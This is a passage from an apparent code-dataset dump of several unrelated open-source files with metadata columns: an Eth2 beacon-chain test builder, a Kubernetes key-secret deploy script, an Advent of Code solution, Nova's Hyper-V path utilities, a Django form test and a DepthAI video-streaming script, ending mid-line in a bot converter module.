state: BeaconState,
epoch: Epoch,
config: Eth2Config,
participation_ratio: float,
number_of_shards_to_check: int,
) -> Iterable[PendingAttestation]:
block_root = get_block_root(
state, epoch, config.SLOTS_PER_EPOCH, config.SLOTS_PER_HISTORICAL_ROOT
)
epoch_start_shard = get_start_shard(state, epoch, CommitteeConfig(config))
if epoch == state.current_epoch(config.SLOTS_PER_EPOCH):
parent_crosslinks = state.current_crosslinks
else:
parent_crosslinks = state.previous_crosslinks
for shard in range(
epoch_start_shard, epoch_start_shard + number_of_shards_to_check
):
shard = Shard(shard % config.SHARD_COUNT)
crosslink_committee = get_crosslink_committee(
state, epoch, shard, CommitteeConfig(config)
)
if not crosslink_committee:
continue
participants_count = math.ceil(participation_ratio * len(crosslink_committee))
if not participants_count:
return tuple()
yield mk_pending_attestation_from_committee(
parent_crosslinks[shard],
participants_count,
shard,
target_epoch=epoch,
target_root=block_root,
)
def mk_all_pending_attestations_with_some_participation_in_epoch(
state: BeaconState, epoch: Epoch, config: Eth2Config, participation_ratio: float
) -> Iterable[PendingAttestation]:
return _mk_some_pending_attestations_with_some_participation_in_epoch(
state,
epoch,
config,
participation_ratio,
get_shard_delta(state, epoch, CommitteeConfig(config)),
)
@to_tuple
def mk_all_pending_attestations_with_full_participation_in_epoch(
state: BeaconState, epoch: Epoch, config: Eth2Config
) -> Iterable[PendingAttestation]:
return mk_all_pending_attestations_with_some_participation_in_epoch(
state, epoch, config, 1.0
)
#
# Aggregation
#
def verify_votes(
message_hash: Hash32,
votes: Iterable[Tuple[ValidatorIndex, BLSSignature, BLSPubkey]],
domain: Domain,
) -> Tuple[Tuple[BLSSignature, ...], Tuple[ValidatorIndex, ...]]:
"""
Verify the given votes.
"""
sigs_with_committee_info = tuple(
(sig, committee_index)
for (committee_index, sig, pubkey) in votes
if bls.verify(
message_hash=message_hash, pubkey=pubkey, signature=sig, domain=domain
)
)
try:
sigs, committee_indices = zip(*sigs_with_committee_info)
except ValueError:
sigs = tuple()
committee_indices = tuple()
return sigs, committee_indices
def aggregate_votes(
bitfield: Bitfield,
sigs: Sequence[BLSSignature],
voting_sigs: Sequence[BLSSignature],
attesting_indices: Sequence[CommitteeIndex],
) -> Tuple[Bitfield, BLSSignature]:
"""
Aggregate the votes.
"""
# Update the bitfield and append the signatures
sigs = tuple(sigs) + tuple(voting_sigs)
bitfield = pipe(
bitfield,
*(set_voted(index=committee_index) for committee_index in attesting_indices)
)
return bitfield, bls.aggregate_signatures(sigs)
#
# Signer
#
def sign_proof_of_possession(deposit_data: DepositData, privkey: int) -> BLSSignature:
return bls.sign(
message_hash=deposit_data.signing_root,
privkey=privkey,
domain=compute_domain(SignatureDomain.DOMAIN_DEPOSIT),
)
def sign_transaction(
*,
message_hash: Hash32,
privkey: int,
state: BeaconState,
slot: Slot,
signature_domain: SignatureDomain,
slots_per_epoch: int
) -> BLSSignature:
domain = get_domain(
state,
signature_domain,
slots_per_epoch,
message_epoch=compute_epoch_of_slot(slot, slots_per_epoch),
)
return bls.sign(message_hash=message_hash, privkey=privkey, domain=domain)
SAMPLE_HASH_1 = Hash32(b"\x11" * 32)
SAMPLE_HASH_2 = Hash32(b"\x22" * 32)
def create_block_header_with_signature(
state: BeaconState,
body_root: Hash32,
privkey: int,
slots_per_epoch: int,
parent_root: Hash32 = SAMPLE_HASH_1,
state_root: Hash32 = SAMPLE_HASH_2,
) -> BeaconBlockHeader:
block_header = BeaconBlockHeader(
slot=state.slot,
parent_root=parent_root,
state_root=state_root,
body_root=body_root,
)
block_header_signature = sign_transaction(
message_hash=block_header.signing_root,
privkey=privkey,
state=state,
slot=block_header.slot,
signature_domain=SignatureDomain.DOMAIN_BEACON_PROPOSER,
slots_per_epoch=slots_per_epoch,
)
return block_header.copy(signature=block_header_signature)
#
#
# Only for test/simulation
#
#
#
# ProposerSlashing
#
def create_mock_proposer_slashing_at_block(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
block_root_1: Hash32,
block_root_2: Hash32,
proposer_index: ValidatorIndex,
) -> ProposerSlashing:
"""
Return a `ProposerSlashing` derived from the given block roots.
If the header roots do not match, the `ProposerSlashing` is valid.
If the header roots do match, the `ProposerSlashing` is not valid.
"""
slots_per_epoch = config.SLOTS_PER_EPOCH
block_header_1 = create_block_header_with_signature(
state,
block_root_1,
keymap[state.validators[proposer_index].pubkey],
slots_per_epoch,
)
block_header_2 = create_block_header_with_signature(
state,
block_root_2,
keymap[state.validators[proposer_index].pubkey],
slots_per_epoch,
)
return ProposerSlashing(
proposer_index=proposer_index, header_1=block_header_1, header_2=block_header_2
)
#
# AttesterSlashing
#
def create_mock_slashable_attestation(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
attestation_slot: Slot,
) -> IndexedAttestation:
"""
Create an `IndexedAttestation` that is signed by one attester.
"""
attester_index = ValidatorIndex(0)
committee = (attester_index,)
shard = Shard(0)
# Use genesis block root as `beacon_block_root`, only for tests.
beacon_block_root = get_block_root_at_slot(
state, attestation_slot, config.SLOTS_PER_HISTORICAL_ROOT
)
# Get `target_root`
target_root = _get_target_root(state, config, beacon_block_root)
# Get `source_root`
source_root = get_block_root_at_slot(
state,
compute_start_slot_of_epoch(
state.current_justified_checkpoint.epoch, config.SLOTS_PER_EPOCH
),
config.SLOTS_PER_HISTORICAL_ROOT,
)
previous_crosslink = state.current_crosslinks[shard]
attestation_data = AttestationData(
beacon_block_root=beacon_block_root,
source=Checkpoint(
epoch=state.current_justified_checkpoint.epoch, root=source_root
),
target=Checkpoint(
epoch=compute_epoch_of_slot(attestation_slot, config.SLOTS_PER_EPOCH),
root=target_root,
),
crosslink=previous_crosslink,
)
message_hash, attesting_indices = _get_mock_message_and_attesting_indices(
attestation_data, committee, num_voted_attesters=1
)
signature = sign_transaction(
message_hash=message_hash,
privkey=keymap[state.validators[attesting_indices[0]].pubkey],
state=state,
slot=attestation_slot,
signature_domain=SignatureDomain.DOMAIN_ATTESTATION,
slots_per_epoch=config.SLOTS_PER_EPOCH,
)
validator_indices = tuple(committee[i] for i in attesting_indices)
return IndexedAttestation(
custody_bit_0_indices=validator_indices,
custody_bit_1_indices=tuple(),
data=attestation_data,
signature=signature,
)
def create_mock_attester_slashing_is_double_vote(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
attestation_epoch: Epoch,
) -> AttesterSlashing:
attestation_slot_1 = compute_start_slot_of_epoch(
attestation_epoch, config.SLOTS_PER_EPOCH
)
attestation_slot_2 = Slot(attestation_slot_1 + 1)
slashable_attestation_1 = create_mock_slashable_attestation(
state, config, keymap, attestation_slot_1
)
slashable_attestation_2 = create_mock_slashable_attestation(
state, config, keymap, attestation_slot_2
)
return AttesterSlashing(
attestation_1=slashable_attestation_1, attestation_2=slashable_attestation_2
)
def create_mock_attester_slashing_is_surround_vote(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
attestation_epoch: Epoch,
) -> AttesterSlashing:
# target_epoch_2 < target_epoch_1
attestation_slot_2 = compute_start_slot_of_epoch(
attestation_epoch, config.SLOTS_PER_EPOCH
)
attestation_slot_1 = Slot(attestation_slot_2 + config.SLOTS_PER_EPOCH)
slashable_attestation_1 = create_mock_slashable_attestation(
state.copy(
slot=attestation_slot_1, current_justified_epoch=config.GENESIS_EPOCH
),
config,
keymap,
attestation_slot_1,
)
slashable_attestation_2 = create_mock_slashable_attestation(
state.copy(
slot=attestation_slot_1,
current_justified_epoch=config.GENESIS_EPOCH
+ 1, # source_epoch_1 < source_epoch_2
),
config,
keymap,
attestation_slot_2,
)
return AttesterSlashing(
attestation_1=slashable_attestation_1, attestation_2=slashable_attestation_2
)
#
# Attestation
#
def _get_target_root(
state: BeaconState, config: Eth2Config, beacon_block_root: Hash32
) -> Hash32:
epoch = compute_epoch_of_slot(state.slot, config.SLOTS_PER_EPOCH)
epoch_start_slot = compute_start_slot_of_epoch(epoch, config.SLOTS_PER_EPOCH)
if epoch_start_slot == state.slot:
return beacon_block_root
else:
return get_block_root(
state, epoch, config.SLOTS_PER_EPOCH, config.SLOTS_PER_HISTORICAL_ROOT
)
def _get_mock_message_and_attesting_indices(
attestation_data: AttestationData,
committee: Sequence[ValidatorIndex],
num_voted_attesters: int,
) -> Tuple[Hash32, Tuple[CommitteeIndex, ...]]:
"""
Get ``message_hash`` and voting indices of the given ``committee``.
"""
message_hash = AttestationDataAndCustodyBit(
data=attestation_data, custody_bit=False
).hash_tree_root
committee_size = len(committee)
assert num_voted_attesters <= committee_size
attesting_indices = tuple(
CommitteeIndex(i)
for i in random.sample(range(committee_size), num_voted_attesters)
)
return message_hash, tuple(sorted(attesting_indices))
def _create_mock_signed_attestation(
state: BeaconState,
attestation_data: AttestationData,
attestation_slot: Slot,
committee: Sequence[ValidatorIndex],
num_voted_attesters: int,
keymap: Dict[BLSPubkey, int],
slots_per_epoch: int,
) -> Attestation:
"""
Create a mocking attestation of the given ``attestation_data`` slot with ``keymap``.
"""
message_hash, attesting_indices = _get_mock_message_and_attesting_indices(
attestation_data, committee, num_voted_attesters
)
# Use privkeys to sign the attestation
signatures = [
sign_transaction(
message_hash=message_hash,
privkey=keymap[state.validators[committee[committee_index]].pubkey],
state=state,
slot=attestation_slot,
signature_domain=SignatureDomain.DOMAIN_ATTESTATION,
slots_per_epoch=slots_per_epoch,
)
for committee_index in attesting_indices
]
# aggregate signatures and construct participant bitfield
aggregation_bits, aggregate_signature = aggregate_votes(
bitfield=get_empty_bitfield(len(committee)),
sigs=(),
voting_sigs=signatures,
attesting_indices=attesting_indices,
)
# create attestation from attestation_data, particpipant_bitfield, and signature
return Attestation(
aggregation_bits=aggregation_bits,
data=attestation_data,
custody_bits=Bitfield((False,) * len(aggregation_bits)),
signature=aggregate_signature,
)
# TODO(ralexstokes) merge in w/ ``get_committee_assignment``
def get_crosslink_committees_at_slot(
state: BeaconState, slot: Slot, config: Eth2Config
) -> Tuple[Tuple[Tuple[ValidatorIndex, ...], Shard], ...]:
epoch = compute_epoch_of_slot(slot, config.SLOTS_PER_EPOCH)
active_validators = get_active_validator_indices(state.validators, epoch)
committees_per_slot = (
get_committee_count(
len(active_validators),
config.SHARD_COUNT,
config.SLOTS_PER_EPOCH,
config.TARGET_COMMITTEE_SIZE,
)
// config.SLOTS_PER_EPOCH
)
results = []
offset = committees_per_slot * (slot % config.SLOTS_PER_EPOCH)
slot_start_shard = Shard(
(get_start_shard(state, epoch, CommitteeConfig(config)) + offset)
% config.SHARD_COUNT
)
for i in range(committees_per_slot):
shard = (slot_start_shard + i) % config.SHARD_COUNT
committee = get_crosslink_committee(
state, epoch, shard, CommitteeConfig(config)
)
results.append((committee, Shard(shard)))
return tuple(results)
def create_signed_attestation_at_slot(
state: BeaconState,
config: Eth2Config,
state_machine: BaseBeaconStateMachine,
attestation_slot: Slot,
beacon_block_root: Hash32,
validator_privkeys: Dict[ValidatorIndex, int],
committee: Tuple[ValidatorIndex, ...],
shard: Shard,
) -> Attestation:
"""
Create the attestations of the given ``attestation_slot`` slot with ``validator_privkeys``.
"""
state_transition = state_machine.state_transition
state = state_transition.apply_state_transition(state, future_slot=attestation_slot)
target_epoch = compute_epoch_of_slot(attestation_slot, config.SLOTS_PER_EPOCH)
target_root = _get_target_root(state, config, beacon_block_root)
parent_crosslink = state.current_crosslinks[shard]
attestation_data = AttestationData(
beacon_block_root=beacon_block_root,
source=Checkpoint(
epoch=state.current_justified_checkpoint.epoch,
root=state.current_justified_checkpoint.root,
),
target=Checkpoint(root=target_root, epoch=target_epoch),
crosslink=Crosslink(
shard=shard,
parent_root=parent_crosslink.hash_tree_root,
start_epoch=parent_crosslink.end_epoch,
end_epoch=target_epoch,
),
)
return _create_mock_signed_attestation(
state,
attestation_data,
attestation_slot,
committee,
len(committee),
keymapper(lambda index: state.validators[index].pubkey, validator_privkeys),
config.SLOTS_PER_EPOCH,
)
@to_tuple
def create_mock_signed_attestations_at_slot(
state: BeaconState,
config: Eth2Config,
state_machine: BaseBeaconStateMachine,
attestation_slot: Slot,
beacon_block_root: Hash32,
keymap: Dict[BLSPubkey, int],
voted_attesters_ratio: float = 1.0,
) -> Iterable[Attestation]:
"""
Create the mocking attestations of the given ``attestation_slot`` slot with ``keymap``.
"""
crosslink_committees_at_slot = get_crosslink_committees_at_slot(
state, attestation_slot, config
)
# Get `target_root`
target_root = _get_target_root(state, config, beacon_block_root)
target_epoch = compute_epoch_of_slot(state.slot, config.SLOTS_PER_EPOCH)
for crosslink_committee in crosslink_committees_at_slot:
committee, shard = crosslink_committee
parent_crosslink = state.current_crosslinks[shard]
attestation_data = AttestationData(
beacon_block_root=beacon_block_root,
source=Checkpoint(
epoch=state.current_justified_checkpoint.epoch,
root=state.current_justified_checkpoint.root,
),
target=Checkpoint(root=target_root, epoch=target_epoch),
crosslink=Crosslink(
shard=shard,
parent_root=parent_crosslink.hash_tree_root,
start_epoch=parent_crosslink.end_epoch,
end_epoch=min(
target_epoch,
parent_crosslink.end_epoch + config.MAX_EPOCHS_PER_CROSSLINK,
),
),
)
num_voted_attesters = int(len(committee) * voted_attesters_ratio)
yield _create_mock_signed_attestation(
state,
attestation_data,
attestation_slot,
committee,
num_voted_attesters,
keymap,
config.SLOTS_PER_EPOCH,
)
#
# VoluntaryExit
#
def create_mock_voluntary_exit(
state: BeaconState,
config: Eth2Config,
keymap: Dict[BLSPubkey, int],
validator_index: ValidatorIndex,
exit_epoch: Epoch = None,
) -> VoluntaryExit:
current_epoch = state.current_epoch(config.SLOTS_PER_EPOCH)
target_epoch = current_epoch if exit_epoch is None else exit_epoch
voluntary_exit = VoluntaryExit(epoch=target_epoch, validator_index=validator_index)
return voluntary_exit.copy(
signature=sign_transaction(
message_hash=voluntary_exit.signing_root,
privkey=keymap[state.validators[validator_index].pubkey],
state=state,
slot=compute_start_slot_of_epoch(target_epoch, config.SLOTS_PER_EPOCH),
signature_domain=SignatureDomain.DOMAIN_VOLUNTARY_EXIT,
slots_per_epoch=config.SLOTS_PER_EPOCH,
)
)
#
# Deposit
#
def create_mock_deposit_data(
*,
config: Eth2Config,
pubkey: BLSPubkey,
privkey: int,
withdrawal_credentials: Hash32,
amount: Gwei = None
) -> DepositData:
if amount is None:
amount = config.MAX_EFFECTIVE_BALANCE
data = DepositData(
pubkey=pubkey, withdrawal_credentials=withdrawal_credentials, amount=amount
)
signature = sign_proof_of_possession(deposit_data=data, privkey=privkey)
return data.copy(signature=signature)
| eth2/beacon/tools/builder/validator.py | 21,728 | Create a mocking attestation of the given ``attestation_data`` slot with ``keymap``.
Get ``message_hash`` and voting indices of the given ``committee``.
Aggregate the votes.
Return a `ProposerSlashing` derived from the given block roots.
If the header roots do not match, the `ProposerSlashing` is valid.
If the header roots do match, the `ProposerSlashing` is not valid.
Create the mocking attestations of the given ``attestation_slot`` slot with ``keymap``.
Create an `IndexedAttestation` that is signed by one attester.
Create the attestations of the given ``attestation_slot`` slot with ``validator_privkeys``.
Verify the given votes.
TODO(ralexstokes) merge w/ below Aggregation Update the bitfield and append the signatures Signer Only for test/simulation ProposerSlashing AttesterSlashing Use genesis block root as `beacon_block_root`, only for tests. Get `target_root` Get `source_root` target_epoch_2 < target_epoch_1 source_epoch_1 < source_epoch_2 Attestation Use privkeys to sign the attestation aggregate signatures and construct participant bitfield create attestation from attestation_data, particpipant_bitfield, and signature TODO(ralexstokes) merge in w/ ``get_committee_assignment`` Get `target_root` VoluntaryExit Deposit | 1,244 | en | 0.688763 |
import base64
import deployment_options
import os
import tempfile
import utils
def render_file(namespace, private_key, public_key):
src_file = os.path.join(os.getcwd(), 'deploy/assisted-installer-local-auth.yaml')
dst_file = os.path.join(os.getcwd(), 'build', namespace, 'assisted-installer-local-auth.yaml')
with open(src_file, "r") as src:
with open(dst_file, "w+") as dst:
data = src.read()
data = data.replace('REPLACE_NAMESPACE', f'"{namespace}"')
data = data.replace('REPLACE_PRIVATE_KEY', f'"{private_key}"')
data = data.replace('REPLACE_PUBLIC_KEY', f'"{public_key}"')
print("Deploying {}".format(dst_file))
dst.write(data)
return dst_file
def encoded_contents(filename):
with open(filename, 'r') as f:
return base64.b64encode(bytearray(f.read(), 'utf-8')).decode('utf-8')
def main():
deploy_options = deployment_options.load_deployment_options()
utils.verify_build_directory(deploy_options.namespace)
# Render a file without values for the operator as we don't want every deployment to have the same values
if not deploy_options.apply_manifest:
render_file(deploy_options.namespace, "", "")
return
secret_name = 'assisted-installer-local-auth-key'
exists = utils.check_if_exists(
"secret",
secret_name,
target=deploy_options.target,
namespace=deploy_options.namespace,
profile=deploy_options.profile
)
if exists:
print(f'Secret {secret_name} already exists in namespace {deploy_options.namespace}')
return
output_dir = tempfile.TemporaryDirectory()
    priv_path = os.path.join(output_dir.name, 'ec-private-key.pem')
    pub_path = os.path.join(output_dir.name, 'ec-public-key.pem')
print(utils.check_output(f'openssl ecparam -name prime256v1 -genkey -noout -out {priv_path}'))
print(utils.check_output(f'openssl ec -in {priv_path} -pubout -out {pub_path}'))
secret_file = render_file(deploy_options.namespace, encoded_contents(priv_path), encoded_contents(pub_path))
utils.apply(
target=deploy_options.target,
namespace=deploy_options.namespace,
profile=deploy_options.profile,
file=secret_file
)
if __name__ == "__main__":
main()
| tools/deploy_local_auth_secret.py | 2,329 | Render a file without values for the operator as we don't want every deployment to have the same values | 103 | en | 0.956093 |
# -*- coding: utf-8 -*-
data = ''
with open('input.txt') as f:
data = f.read().strip()
def Reacts(a, b):
if a == b:
return False
if a.lower() == b or b.lower() == a:
return True
return False
def Collapse(polymer):
i = 1
while i < len(polymer):
if Reacts(polymer[i - 1], polymer[i]):
del(polymer[i-1])
del(polymer[i-1])
            # clamp so the next comparison cannot wrap around to polymer[-1]
            i = max(i - 2, 0)
i += 1
return polymer
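# e.g. ''.join(Collapse(list('dabAcCaCBAcCcaDA'))) == 'dabCBAcaDA' (length 10)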
#data = 'bbbbAaccc'
polymer = list(data)
p_c = Collapse(polymer)
print(len(p_c))
alphabet = 'abcdefghijklmnopqrstuvwxyz'
len_min = len(polymer)
for l in alphabet:
filtered_data = data.replace(l, '').replace(l.upper(), '')
polymer = list(filtered_data)
p_c = Collapse(polymer)
print(l, len(p_c))
if len(p_c) < len_min:
len_min = len(p_c)
print(len_min) | 05/aoc05.py | 911 | -*- coding: utf-8 -*-data = 'bbbbAaccc' | 39 | en | 0.603952 |
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import sys
if sys.platform == 'win32':
import wmi
from oslo_config import cfg
from nova.i18n import _
from nova.openstack.common import log as logging
from nova import utils
from nova.virt.hyperv import constants
from nova.virt.hyperv import vmutils
LOG = logging.getLogger(__name__)
hyperv_opts = [
cfg.StrOpt('instances_path_share',
default="",
help='The name of a Windows share name mapped to the '
'"instances_path" dir and used by the resize feature '
'to copy files to the target host. If left blank, an '
'administrative share will be used, looking for the same '
'"instances_path" used locally'),
]
CONF = cfg.CONF
CONF.register_opts(hyperv_opts, 'hyperv')
CONF.import_opt('instances_path', 'nova.compute.manager')
ERROR_INVALID_NAME = 123
class PathUtils(object):
def __init__(self):
self._smb_conn = wmi.WMI(moniker=r"root\Microsoft\Windows\SMB")
def open(self, path, mode):
"""Wrapper on __builtin__.open used to simplify unit testing."""
import __builtin__
return __builtin__.open(path, mode)
def exists(self, path):
return os.path.exists(path)
def makedirs(self, path):
os.makedirs(path)
def remove(self, path):
os.remove(path)
def rename(self, src, dest):
os.rename(src, dest)
def copyfile(self, src, dest):
self.copy(src, dest)
def copy(self, src, dest):
# With large files this is 2x-3x faster than shutil.copy(src, dest),
# especially when copying to a UNC target.
# shutil.copyfileobj(...) with a proper buffer is better than
# shutil.copy(...) but still 20% slower than a shell copy.
# It can be replaced with Win32 API calls to avoid the process
# spawning overhead.
output, ret = utils.execute('cmd.exe', '/C', 'copy', '/Y', src, dest)
if ret:
raise IOError(_('The file copy from %(src)s to %(dest)s failed')
% {'src': src, 'dest': dest})
def rmtree(self, path):
shutil.rmtree(path)
def get_instances_dir(self, remote_server=None):
local_instance_path = os.path.normpath(CONF.instances_path)
if remote_server:
if CONF.hyperv.instances_path_share:
path = CONF.hyperv.instances_path_share
else:
# Use an administrative share
path = local_instance_path.replace(':', '$')
return ('\\\\%(remote_server)s\\%(path)s' %
{'remote_server': remote_server, 'path': path})
else:
return local_instance_path
def _check_create_dir(self, path):
if not self.exists(path):
LOG.debug('Creating directory: %s', path)
self.makedirs(path)
def _check_remove_dir(self, path):
if self.exists(path):
LOG.debug('Removing directory: %s', path)
self.rmtree(path)
def _get_instances_sub_dir(self, dir_name, remote_server=None,
create_dir=True, remove_dir=False):
instances_path = self.get_instances_dir(remote_server)
path = os.path.join(instances_path, dir_name)
try:
if remove_dir:
self._check_remove_dir(path)
if create_dir:
self._check_create_dir(path)
return path
except WindowsError as ex:
if ex.winerror == ERROR_INVALID_NAME:
raise vmutils.HyperVException(_(
"Cannot access \"%(instances_path)s\", make sure the "
"path exists and that you have the proper permissions. "
"In particular Nova-Compute must not be executed with the "
"builtin SYSTEM account or other accounts unable to "
"authenticate on a remote host.") %
{'instances_path': instances_path})
raise
def get_instance_migr_revert_dir(self, instance_name, create_dir=False,
remove_dir=False):
dir_name = '%s_revert' % instance_name
return self._get_instances_sub_dir(dir_name, None, create_dir,
remove_dir)
def get_instance_dir(self, instance_name, remote_server=None,
create_dir=True, remove_dir=False):
return self._get_instances_sub_dir(instance_name, remote_server,
create_dir, remove_dir)
def _lookup_vhd_path(self, instance_name, vhd_path_func):
vhd_path = None
for format_ext in ['vhd', 'vhdx']:
test_path = vhd_path_func(instance_name, format_ext)
if self.exists(test_path):
vhd_path = test_path
break
return vhd_path
def lookup_root_vhd_path(self, instance_name):
return self._lookup_vhd_path(instance_name, self.get_root_vhd_path)
def lookup_configdrive_path(self, instance_name):
configdrive_path = None
for format_ext in constants.DISK_FORMAT_MAP:
test_path = self.get_configdrive_path(instance_name, format_ext)
if self.exists(test_path):
configdrive_path = test_path
break
return configdrive_path
def lookup_ephemeral_vhd_path(self, instance_name):
return self._lookup_vhd_path(instance_name,
self.get_ephemeral_vhd_path)
def get_root_vhd_path(self, instance_name, format_ext):
instance_path = self.get_instance_dir(instance_name)
return os.path.join(instance_path, 'root.' + format_ext.lower())
def get_configdrive_path(self, instance_name, format_ext):
instance_path = self.get_instance_dir(instance_name)
return os.path.join(instance_path, 'configdrive.' + format_ext.lower())
def get_ephemeral_vhd_path(self, instance_name, format_ext):
instance_path = self.get_instance_dir(instance_name)
return os.path.join(instance_path, 'ephemeral.' + format_ext.lower())
def get_base_vhd_dir(self):
return self._get_instances_sub_dir('_base')
def get_export_dir(self, instance_name):
dir_name = os.path.join('export', instance_name)
return self._get_instances_sub_dir(dir_name, create_dir=True,
remove_dir=True)
def get_vm_console_log_paths(self, vm_name, remote_server=None):
instance_dir = self.get_instance_dir(vm_name,
remote_server)
console_log_path = os.path.join(instance_dir, 'console.log')
return console_log_path, console_log_path + '.1'
def check_smb_mapping(self, smbfs_share):
mappings = self._smb_conn.Msft_SmbMapping(RemotePath=smbfs_share)
if not mappings:
return False
if os.path.exists(smbfs_share):
LOG.debug('Share already mounted: %s', smbfs_share)
return True
else:
LOG.debug('Share exists but is unavailable: %s ', smbfs_share)
self.unmount_smb_share(smbfs_share, force=True)
return False
def mount_smb_share(self, smbfs_share, username=None, password=None):
try:
LOG.debug('Mounting share: %s', smbfs_share)
self._smb_conn.Msft_SmbMapping.Create(RemotePath=smbfs_share,
UserName=username,
Password=password)
except wmi.x_wmi as exc:
err_msg = (_(
'Unable to mount SMBFS share: %(smbfs_share)s '
'WMI exception: %(wmi_exc)s'), {'smbfs_share': smbfs_share,
'wmi_exc': exc})
raise vmutils.HyperVException(err_msg)
def unmount_smb_share(self, smbfs_share, force=False):
mappings = self._smb_conn.Msft_SmbMapping(RemotePath=smbfs_share)
if not mappings:
LOG.debug('Share %s is not mounted. Skipping unmount.',
smbfs_share)
for mapping in mappings:
# Due to a bug in the WMI module, getting the output of
# methods returning None will raise an AttributeError
try:
mapping.Remove(Force=force)
except AttributeError:
pass
except wmi.x_wmi:
# If this fails, a 'Generic Failure' exception is raised.
# This happens even if we unforcefully unmount an in-use
# share, for which reason we'll simply ignore it in this
# case.
if force:
raise vmutils.HyperVException(
_("Could not unmount share: %s"), smbfs_share)
| nova/virt/hyperv/pathutils.py | 9,588 | Wrapper on __builtin__.open used to simplify unit testing.
Copyright 2013 Cloudbase Solutions Srl All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. With large files this is 2x-3x faster than shutil.copy(src, dest), especially when copying to a UNC target. shutil.copyfileobj(...) with a proper buffer is better than shutil.copy(...) but still 20% slower than a shell copy. It can be replaced with Win32 API calls to avoid the process spawning overhead. Use an administrative share Due to a bug in the WMI module, getting the output of methods returning None will raise an AttributeError If this fails, a 'Generic Failure' exception is raised. This happens even if we unforcefully unmount an in-use share, for which reason we'll simply ignore it in this case. | 1,281 | en | 0.866854 |
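A minimal usage sketch of the PathUtils class above; the instance name is a placeholder, and running it requires a Windows host with the wmi package plus a loaded nova configuration:

pathutils = PathUtils()
instance_dir = pathutils.get_instance_dir('instance-00000001')
root_vhd = pathutils.lookup_root_vhd_path('instance-00000001')
console_log, archived_log = pathutils.get_vm_console_log_paths('instance-00000001')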
"""
Module for all Form Tests.
"""
import pytest
from django.utils.translation import gettext_lazy as _
from djcutter.users.forms import UserCreationForm
from djcutter.users.models import User
pytestmark = pytest.mark.django_db
class TestUserCreationForm:
"""
Test class for all tests related to the UserCreationForm
"""
def test_username_validation_error_msg(self, user: User):
"""
Tests UserCreation Form's unique validator functions correctly by testing:
1) A new user with an existing username cannot be added.
2) Only 1 error is raised by the UserCreation Form
3) The desired error message is raised
"""
# The user already exists,
# hence cannot be created.
form = UserCreationForm(
{
"username": user.username,
"password1": user.password,
"password2": user.password,
}
)
assert not form.is_valid()
assert len(form.errors) == 1
assert "username" in form.errors
assert form.errors["username"][0] == _("This username has already been taken.")
| djcutter/users/tests/test_forms.py | 1,165 | Test class for all tests related to the UserCreationForm
Tests UserCreation Form's unique validator functions correctly by testing:
1) A new user with an existing username cannot be added.
2) Only 1 error is raised by the UserCreation Form
3) The desired error message is raised
Module for all Form Tests.
The user already exists, hence cannot be created. | 369 | en | 0.84332 |
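The test above relies on a user pytest fixture that supplies an already-persisted User. A hypothetical minimal fixture (the actual project may build it with a factory instead) could look like this:

import pytest

from djcutter.users.models import User


@pytest.fixture
def user(db) -> User:
    # Hypothetical fixture: the test only needs an existing username
    # that will collide with the form input.
    return User.objects.create_user(username="existing-user", password="s3cret-pass-123")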
#!/usr/bin/env python3
import depthai as dai
import subprocess as sp
from os import name as osName
# Create pipeline
pipeline = dai.Pipeline()
# Define sources and output
camRgb = pipeline.createColorCamera()
videoEnc = pipeline.createVideoEncoder()
xout = pipeline.createXLinkOut()
xout.setStreamName("h264")
# Properties
camRgb.setBoardSocket(dai.CameraBoardSocket.RGB)
camRgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_4_K)
videoEnc.setDefaultProfilePreset(camRgb.getVideoSize(), camRgb.getFps(), dai.VideoEncoderProperties.Profile.H264_MAIN)
# Linking
camRgb.video.link(videoEnc.input)
videoEnc.bitstream.link(xout.input)
width, height = 720, 500
command = [
"ffplay",
"-i", "-",
"-x", str(width),
"-y", str(height),
"-framerate", "60",
"-fflags", "nobuffer",
"-flags", "low_delay",
"-framedrop",
"-strict", "experimental"
]
if osName == "nt": # Running on Windows
command = ["cmd", "/c"] + command
try:
proc = sp.Popen(command, stdin=sp.PIPE) # Start the ffplay process
except:
exit("Error: cannot run ffplay!\nTry running: sudo apt install ffmpeg")
# Connect to device and start pipeline
with dai.Device(pipeline) as device:
# Output queue will be used to get the encoded data from the output defined above
q = device.getOutputQueue(name="h264", maxSize=30, blocking=True)
try:
while True:
data = q.get().getData() # Blocking call, will wait until new data has arrived
proc.stdin.write(data)
except:
pass
proc.stdin.close()
| gen2-play-encoded-stream/main.py | 1,571 | !/usr/bin/env python3 Create pipeline Define sources and output Properties Linking Running on Windows Start the ffplay process Connect to device and start pipeline Output queue will be used to get the encoded data from the output defined above Blocking call, will wait until new data has arrived | 295 | en | 0.797659 |
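If live playback is not needed, the same output queue can be drained into an H.264 elementary stream on disk and muxed into a container afterwards; a hedged sketch of that variant, reusing the pipeline defined above:

with open('video.h264', 'wb') as video_file:
    with dai.Device(pipeline) as device:
        q = device.getOutputQueue(name="h264", maxSize=30, blocking=True)
        try:
            while True:
                video_file.write(q.get().getData())  # append each encoded packet
        except KeyboardInterrupt:
            pass
# Afterwards, wrap the raw stream into a container, e.g.:
#   ffmpeg -framerate 30 -i video.h264 -c copy video.mp4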
# https://github.com/TrustyJAID/Trusty-cogs/blob/master/notsobot/converter.py
import re
from discord.ext.commands.converter import Converter
from discord.ext.commands.errors import BadArgument
from redbot.core.i18n import Translator
_ = Translator("ReverseImageSearch", __file__)
IMAGE_LINKS = re.compile(
